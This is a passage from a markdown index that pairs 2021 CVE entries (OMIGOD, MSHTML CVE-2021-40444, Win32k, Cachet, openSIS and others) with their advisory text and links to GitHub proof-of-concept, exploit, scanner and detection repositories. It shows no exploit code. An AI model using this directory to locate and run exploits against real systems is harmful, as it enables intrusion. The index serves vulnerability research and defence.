- [marcosimioni/omigood](https://github.com/marcosimioni/omigood)
- [craig-m-unsw/omigod-lab](https://github.com/craig-m-unsw/omigod-lab)
- [SimenBai/CVE-2021-38647-POC-and-Demo-environment](https://github.com/SimenBai/CVE-2021-38647-POC-and-Demo-environment)
- [AlteredSecurity/CVE-2021-38647](https://github.com/AlteredSecurity/CVE-2021-38647)
- [abousteif/cve-2021-38647](https://github.com/abousteif/cve-2021-38647)
- [Vulnmachines/OMIGOD_cve-2021-38647](https://github.com/Vulnmachines/OMIGOD_cve-2021-38647)
- [goofsec/omigod](https://github.com/goofsec/omigod)
- [corelight/CVE-2021-38647-noimages](https://github.com/corelight/CVE-2021-38647-noimages)
### CVE-2021-38666 (2021-11-10)
Remote Desktop Client Remote Code Execution Vulnerability
- [DarkSprings/CVE-2021-38666-poc](https://github.com/DarkSprings/CVE-2021-38666-poc)
- [JaneMandy/CVE-2021-38666](https://github.com/JaneMandy/CVE-2021-38666)
### CVE-2021-38699 (2021-08-15)
TastyIgniter 3.0.7 allows XSS via /account, /reservation, /admin/dashboard, and /admin/system_logs.
- [HuskyHacks/CVE-2021-38699-Reflected-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Reflected-XSS)
- [HuskyHacks/CVE-2021-38699-Stored-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Stored-XSS)
- [Justin-1993/CVE-2021-38699](https://github.com/Justin-1993/CVE-2021-38699)
### CVE-2021-38817
- [HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection](https://github.com/HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection)
### CVE-2021-38819 (2022-11-16)
A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page.
- [m4sk0ff/CVE-2021-38819](https://github.com/m4sk0ff/CVE-2021-38819)
### CVE-2021-39115 (2021-09-01)
Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.
- [PetrusViet/CVE-2021-39115](https://github.com/PetrusViet/CVE-2021-39115)
### CVE-2021-39141 (2021-08-23)
XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
- [zwjjustdoit/Xstream-1.4.17](https://github.com/zwjjustdoit/Xstream-1.4.17)
### CVE-2021-39165 (2021-08-26)
Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
- [W0rty/CVE-2021-39165](https://github.com/W0rty/CVE-2021-39165)
- [manbolq/CVE-2021-39165](https://github.com/manbolq/CVE-2021-39165)
### CVE-2021-39172 (2021-08-27)
Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.
- [W1ngLess/CVE-2021-39172-RCE](https://github.com/W1ngLess/CVE-2021-39172-RCE)
### CVE-2021-39174 (2021-08-27)
Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.
- [n0kovo/CVE-2021-39174-PoC](https://github.com/n0kovo/CVE-2021-39174-PoC)
- [hadrian3689/cachet_2.4.0-dev](https://github.com/hadrian3689/cachet_2.4.0-dev)
### CVE-2021-39273 (2021-08-19)
In XeroSecurity Sn1per 9.0 (free version), insecure permissions (0777) are set upon application execution, allowing an unprivileged user to modify the application, modules, and configuration files. This leads to arbitrary code execution with root privileges.
- [nikip72/CVE-2021-39273-CVE-2021-39274](https://github.com/nikip72/CVE-2021-39273-CVE-2021-39274)
### CVE-2021-39287
- [Fearless523/CVE-2021-39287-Stored-XSS](https://github.com/Fearless523/CVE-2021-39287-Stored-XSS)
### CVE-2021-39377 (2021-09-01)
A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the index.php username parameter.
- [security-n/CVE-2021-39377](https://github.com/security-n/CVE-2021-39377)
### CVE-2021-39378 (2021-09-01)
A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the NamesList.php str parameter.
- [security-n/CVE-2021-39378](https://github.com/security-n/CVE-2021-39378)
### CVE-2021-39379 (2021-09-01)
A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the ResetUserInfo.php password_stn_id parameter.
- [security-n/CVE-2021-39379](https://github.com/security-n/CVE-2021-39379)
### CVE-2021-39408 (2022-06-24)
Cross Site Scripting (XSS) vulnerability exists in Online Student Rate System 1.0 via the page parameter on the index.php file
- [StefanDorresteijn/CVE-2021-39408](https://github.com/StefanDorresteijn/CVE-2021-39408)
### CVE-2021-39409 (2022-06-24)
A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.
- [StefanDorresteijn/CVE-2021-39409](https://github.com/StefanDorresteijn/CVE-2021-39409)
### CVE-2021-39433 (2021-10-04)
A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
- [PinkDraconian/CVE-2021-39433](https://github.com/PinkDraconian/CVE-2021-39433)
- [ibnurusdianto/CVE-2021-39433](https://github.com/ibnurusdianto/CVE-2021-39433)
### CVE-2021-39473 (2022-11-04)
Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields.
- [BrunoTeixeira1996/CVE-2021-39473](https://github.com/BrunoTeixeira1996/CVE-2021-39473)
### CVE-2021-39475
- [W4RCL0UD/CVE-2021-39475](https://github.com/W4RCL0UD/CVE-2021-39475)
### CVE-2021-39476
- [W4RCL0UD/CVE-2021-39476](https://github.com/W4RCL0UD/CVE-2021-39476)
### CVE-2021-39512
- [guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver](https://github.com/guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver)
### CVE-2021-39623 (2022-01-14)
In doRead of SimpleDecodingSource.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194105348
- [bb33bb/CVE-2021-39623](https://github.com/bb33bb/CVE-2021-39623)
### CVE-2021-39670 (2022-05-10)
In setStream of WallpaperManager.java, there is a possible way to cause a permanent DoS due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-204087139
- [Supersonic/Wallbreak](https://github.com/Supersonic/Wallbreak)
### CVE-2021-39685 (2022-03-16)
In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel
- [szymonh/inspector-gadget](https://github.com/szymonh/inspector-gadget)
### CVE-2021-39692 (2022-03-16)
In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539
- [nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692](https://github.com/nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692)
### CVE-2021-39696 (2022-08-09)
In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-185810717
- [nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696)
### CVE-2021-39704 (2022-03-16)
In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-39704](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-39704)
### CVE-2021-39706 (2022-03-16)
In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706)
### CVE-2021-39749 (2022-03-30)
In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205996115
- [michalbednarski/OrganizerTransaction](https://github.com/michalbednarski/OrganizerTransaction)
### CVE-2021-39863 (2021-09-29)
Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [lsw29475/CVE-2021-39863](https://github.com/lsw29475/CVE-2021-39863)
- [WHS-SEGFAULT/CVE-2021-39863](https://github.com/WHS-SEGFAULT/CVE-2021-39863)
### CVE-2021-40101 (2021-11-30)
An issue was discovered in Concrete CMS before 8.5.7. The Dashboard allows a user's password to be changed without a prompt for the current password.
- [S1lkys/CVE-2021-40101](https://github.com/S1lkys/CVE-2021-40101)
### CVE-2021-40113 (2021-11-04)
Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform command injection Modify the configuration For more information about these vulnerabilities, see the Details section of this advisory.
- [karamMahmad/CVE-2021-40113](https://github.com/karamMahmad/CVE-2021-40113)
### CVE-2021-40154 (2021-12-01)
NXP LPC55S69 devices before A3 have a buffer over-read via a crafted wlength value in a GET Descriptor Configuration request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.
- [Jeromeyoung/CVE-2021-40154](https://github.com/Jeromeyoung/CVE-2021-40154)
### CVE-2021-40222 (2021-09-09)
Rittal CMC PU III Web management Version affected: V3.11.00_2. Version fixed: V3.17.10 is affected by a remote code execution vulnerablity. It is possible to introduce shell code to create a reverse shell in the PU-Hostname field of the TCP/IP Configuration dialog. Web application fails to sanitize user input on Network TCP/IP configuration page. This allows the attacker to inject commands as root on the device which will be executed once the data is received.
- [asang17/CVE-2021-40222](https://github.com/asang17/CVE-2021-40222)
### CVE-2021-40223 (2021-09-09)
Rittal CMC PU III Web management (version V3.11.00_2) fails to sanitize user input on several parameters of the configuration (User Configuration dialog, Task Configuration dialog and set logging filter dialog). This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts). The XSS payload will be triggered when the user accesses some specific sections of the application.
- [asang17/CVE-2021-40223](https://github.com/asang17/CVE-2021-40223)
### CVE-2021-40303 (2022-11-08)
perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.
- [zecopro/CVE-2021-40303](https://github.com/zecopro/CVE-2021-40303)
### CVE-2021-40345 (2021-10-26)
An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands.
- [ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345](https://github.com/ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345)
### CVE-2021-40346 (2021-09-08)
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
- [knqyf263/CVE-2021-40346](https://github.com/knqyf263/CVE-2021-40346)
- [donky16/CVE-2021-40346-POC](https://github.com/donky16/CVE-2021-40346-POC)
- [alikarimi999/CVE-2021-40346](https://github.com/alikarimi999/CVE-2021-40346)
- [Vulnmachines/HAProxy_CVE-2021-40346](https://github.com/Vulnmachines/HAProxy_CVE-2021-40346)
- [alexOarga/CVE-2021-40346](https://github.com/alexOarga/CVE-2021-40346)
### CVE-2021-40352 (2021-09-01)
OpenEMR 6.0.0 has a pnotes_print.php?noteid= Insecure Direct Object Reference vulnerability via which an attacker can read the messages of all users.
- [allenenosh/CVE-2021-40352](https://github.com/allenenosh/CVE-2021-40352)
### CVE-2021-40353 (2021-09-01)
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637.
- [5qu1n7/CVE-2021-40353](https://github.com/5qu1n7/CVE-2021-40353)
### CVE-2021-40373 (2021-09-10)
playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI.
- [maikroservice/CVE-2021-40373](https://github.com/maikroservice/CVE-2021-40373)
### CVE-2021-40374 (2022-04-06)
A stored cross-site scripting (XSS) vulnerability was identified in Apperta Foundation OpenEyes 3.5.1. Updating a patient's details allows remote attackers to inject arbitrary web script or HTML via the Address1 parameter. This JavaScript then executes when the patient profile is loaded, which could be used in a XSS attack.
- [DCKento/CVE-2021-40374](https://github.com/DCKento/CVE-2021-40374)
### CVE-2021-40375 (2022-04-06)
Apperta Foundation OpenEyes 3.5.1 allows remote attackers to view the sensitive information of patients without having the intended level of privilege. Despite OpenEyes returning a Forbidden error message, the contents of a patient's profile are still returned in the server response. This response can be read in an intercepting proxy or by viewing the page source. Sensitive information returned in responses includes patient PII and medication records or history.
- [DCKento/CVE-2021-40375](https://github.com/DCKento/CVE-2021-40375)
### CVE-2021-40438 (2021-09-16)
A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.
- [xiaojiangxl/CVE-2021-40438](https://github.com/xiaojiangxl/CVE-2021-40438)
- [sixpacksecurity/CVE-2021-40438](https://github.com/sixpacksecurity/CVE-2021-40438)
- [BabyTeam1024/CVE-2021-40438](https://github.com/BabyTeam1024/CVE-2021-40438)
- [ericmann/apache-cve-poc](https://github.com/ericmann/apache-cve-poc)
- [pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt)
- [Kashkovsky/CVE-2021-40438](https://github.com/Kashkovsky/CVE-2021-40438)
- [gassara-kys/CVE-2021-40438](https://github.com/gassara-kys/CVE-2021-40438)
- [sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit](https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit)
- [Cappricio-Securities/CVE-2021-40438](https://github.com/Cappricio-Securities/CVE-2021-40438)
### CVE-2021-40444 (2021-09-15)
<p>Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.</p>\n<p>An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p>\n<p>Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.</p>\n<p>Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.</p>\n<p>Please see the <strong>Mitigations</strong> and <strong>Workaround</strong> sections for important information about steps you can take to protect your system from this vulnerability.</p>\n<p><strong>UPDATE</strong> September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.</p>\n
- [ozergoker/CVE-2021-40444](https://github.com/ozergoker/CVE-2021-40444)
- [DarkSprings/CVE-2021-40444](https://github.com/DarkSprings/CVE-2021-40444)
- [rfcxv/CVE-2021-40444-POC](https://github.com/rfcxv/CVE-2021-40444-POC)
- [bambooqj/CVE-2021-40444_EXP_JS](https://github.com/bambooqj/CVE-2021-40444_EXP_JS)
- [Immersive-Labs-Sec/cve-2021-40444-analysis](https://github.com/Immersive-Labs-Sec/cve-2021-40444-analysis)
- [vysecurity/CVE-2021-40444](https://github.com/vysecurity/CVE-2021-40444)
- [k4k4/CVE-2021-40444-Sample](https://github.com/k4k4/CVE-2021-40444-Sample)
- [lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)
- [fengjixuchui/CVE-2021-40444-docx-Generate](https://github.com/fengjixuchui/CVE-2021-40444-docx-Generate)
- [KnoooW/CVE-2021-40444-docx-Generate](https://github.com/KnoooW/CVE-2021-40444-docx-Generate)
- [mansk1es/Caboom](https://github.com/mansk1es/Caboom)
- [jamesrep/cve-2021-40444](https://github.com/jamesrep/cve-2021-40444)
- [W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx](https://github.com/W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx)
- [aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)
- [khoaduynu/CVE-2021-40444](https://github.com/khoaduynu/CVE-2021-40444)
- [Jeromeyoung/MSHTMHell](https://github.com/Jeromeyoung/MSHTMHell)
- [k8gege/CVE-2021-40444](https://github.com/k8gege/CVE-2021-40444)
- [klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)
- [Phuong39/CVE-2021-40444-CAB](https://github.com/Phuong39/CVE-2021-40444-CAB)
- [Edubr2020/CVE-2021-40444--CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)
- [kal1gh0st/CVE-2021-40444_CAB_archives](https://github.com/kal1gh0st/CVE-2021-40444_CAB_archives)
- [LazarusReborn/Docx-Exploit-2021](https://github.com/LazarusReborn/Docx-Exploit-2021)
- [H0j3n/CVE-2021-40444](https://github.com/H0j3n/CVE-2021-40444)
- [metehangenel/MSHTML-CVE-2021-40444](https://github.com/metehangenel/MSHTML-CVE-2021-40444)
- [Jeromeyoung/TIC4301_Project](https://github.com/Jeromeyoung/TIC4301_Project)
- [tiagob0b/CVE-2021-40444](https://github.com/tiagob0b/CVE-2021-40444)
- [kagura-maru/CVE-2021-40444-POC](https://github.com/kagura-maru/CVE-2021-40444-POC)
- [Zeop-CyberSec/word_mshtml](https://github.com/Zeop-CyberSec/word_mshtml)
- [Alexcot25051999/CVE-2021-40444](https://github.com/Alexcot25051999/CVE-2021-40444)
- [lisinan988/CVE-2021-40444-exp](https://github.com/lisinan988/CVE-2021-40444-exp)
- [34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit](https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit)
- [MRacumen/CVE-2021-40444](https://github.com/MRacumen/CVE-2021-40444)
- [RedLeavesChilde/CVE-2021-40444](https://github.com/RedLeavesChilde/CVE-2021-40444)
- [nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-](https://github.com/nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-)
- [hqdat809/CVE-2021-40444](https://github.com/hqdat809/CVE-2021-40444)
- [basim-ahmad/Follina-CVE-and-CVE-2021-40444](https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444)
### CVE-2021-40449 (2021-10-13)
Win32k Elevation of Privilege Vulnerability
- [ly4k/CallbackHell](https://github.com/ly4k/CallbackHell)
- [KaLendsi/CVE-2021-40449-Exploit](https://github.com/KaLendsi/CVE-2021-40449-Exploit)
- [hakivvi/CVE-2021-40449](https://github.com/hakivvi/CVE-2021-40449)
- [Kristal-g/CVE-2021-40449_poc](https://github.com/Kristal-g/CVE-2021-40449_poc)
- [CppXL/cve-2021-40449-poc](https://github.com/CppXL/cve-2021-40449-poc)
- [BL0odz/CVE-2021-40449-NtGdiResetDC-UAF](https://github.com/BL0odz/CVE-2021-40449-NtGdiResetDC-UAF)
- [SamuelTulach/voidmap](https://github.com/SamuelTulach/voidmap)
- [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449)
### CVE-2021-40492 (2021-09-03)
A reflected XSS vulnerability exists in multiple pages in version 22 of the Gibbon application that allows for arbitrary execution of JavaScript (gibbonCourseClassID, gibbonPersonID, subpage, currentDate, or allStudents to index.php).
- [5qu1n7/CVE-2021-40492](https://github.com/5qu1n7/CVE-2021-40492)
### CVE-2021-40512
- [war4uthor/CVE-2021-40512](https://github.com/war4uthor/CVE-2021-40512)
### CVE-2021-40513
- [war4uthor/CVE-2021-40513](https://github.com/war4uthor/CVE-2021-40513)
### CVE-2021-40514
- [war4uthor/CVE-2021-40514](https://github.com/war4uthor/CVE-2021-40514)
### CVE-2021-40531 (2021-09-06)
Sketch before 75 allows library feeds to be used to bypass file quarantine. Files are automatically downloaded and opened, without the com.apple.quarantine extended attribute. This results in remote code execution, as demonstrated by CommandString in a terminal profile to Terminal.app.
- [jonpalmisc/CVE-2021-40531](https://github.com/jonpalmisc/CVE-2021-40531)
### CVE-2021-40539 (2021-09-07)
Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
- [DarkSprings/CVE-2021-40539](https://github.com/DarkSprings/CVE-2021-40539)
- [synacktiv/CVE-2021-40539](https://github.com/synacktiv/CVE-2021-40539)
- [lpyzds/CVE-2021-40539](https://github.com/lpyzds/CVE-2021-40539)
- [lpyydxs/CVE-2021-40539](https://github.com/lpyydxs/CVE-2021-40539)
- [Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539](https://github.com/Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539)
### CVE-2021-40822 (2022-05-01)
GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
- [phor3nsic/CVE-2021-40822](https://github.com/phor3nsic/CVE-2021-40822)
### CVE-2021-40839 (2021-09-10)
The rencode package through 1.0.6 for Python allows an infinite loop in typecode decoding (such as via ;\x2f\x7f), enabling a remote attack that consumes CPU and memory.
- [itlabbet/CVE-2021-40839](https://github.com/itlabbet/CVE-2021-40839)
### CVE-2021-40845 (2021-09-15)
The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory.
- [ricardojoserf/CVE-2021-40845](https://github.com/ricardojoserf/CVE-2021-40845)
### CVE-2021-40859 (2021-12-07)
Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow attackers with access to the web based management application full administrative access to the device.
- [419066074/CVE-2021-40859](https://github.com/419066074/CVE-2021-40859)
- [0xr001/CVE-2021-40859](https://github.com/0xr001/CVE-2021-40859)
- [pussycat0x/CVE-2021-40859](https://github.com/pussycat0x/CVE-2021-40859)
### CVE-2021-40865 (2021-10-25)
An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4
- [hktalent/CVE-2021-40865](https://github.com/hktalent/CVE-2021-40865)
### CVE-2021-40870 (2021-09-13)
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
- [System00-Security/CVE-2021-40870](https://github.com/System00-Security/CVE-2021-40870)
- [0xAgun/CVE-2021-40870](https://github.com/0xAgun/CVE-2021-40870)
- [orangmuda/CVE-2021-40870](https://github.com/orangmuda/CVE-2021-40870)
- [JoyGhoshs/CVE-2021-40870](https://github.com/JoyGhoshs/CVE-2021-40870)
### CVE-2021-40875 (2021-09-22)
Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
- [SakuraSamuraii/derailed](https://github.com/SakuraSamuraii/derailed)
- [Lul/TestRail-files.md5-IAC-scanner](https://github.com/Lul/TestRail-files.md5-IAC-scanner)
### CVE-2021-40903 (2022-06-17)
A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static.
- [vulnz/CVE-2021-40903](https://github.com/vulnz/CVE-2021-40903)
### CVE-2021-40904 (2022-03-25)
The web management console of CheckMK Raw Edition (versions 1.5.0 to 1.6.0) allows a misconfiguration of the web-app Dokuwiki (installed by default), which allows embedded php code. As a result, remote code execution is achieved. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session by a user with the role of administrator.
- [Edgarloyola/CVE-2021-40904](https://github.com/Edgarloyola/CVE-2021-40904)
### CVE-2021-40905 (2022-03-25)
The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with administrator role. NOTE: the vendor states that this is the intended behavior: admins are supposed to be able to execute code in this manner
- [Edgarloyola/CVE-2021-40905](https://github.com/Edgarloyola/CVE-2021-40905)
### CVE-2021-40906 (2022-03-25)
CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This Reflected XSS allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts) or to steal the session cookies of a user who has previously authenticated via a man in the middle. Successful exploitation requires access to the web service resource without authentication.
- [Edgarloyola/CVE-2021-40906](https://github.com/Edgarloyola/CVE-2021-40906)
### CVE-2021-40978 (2021-10-07)
The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1
- [nisdn/CVE-2021-40978](https://github.com/nisdn/CVE-2021-40978)
### CVE-2021-41073 (2021-09-19)
loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc/<pid>/maps for exploitation.
- [chompie1337/Linux_LPE_io_uring_CVE-2021-41073](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073)
### CVE-2021-41074
- [dillonkirsch/CVE-2021-41074](https://github.com/dillonkirsch/CVE-2021-41074)
### CVE-2021-41078 (2021-10-26)
Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.
- [s-index/CVE-2021-41078](https://github.com/s-index/CVE-2021-41078)
### CVE-2021-41081 (2021-11-11)
Zoho ManageEngine Network Configuration Manager before 125465 is vulnerable to SQL Injection in a configuration search.
- [sudaiv/CVE-2021-41081](https://github.com/sudaiv/CVE-2021-41081)
### CVE-2021-41091 (2021-10-04)
Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers.
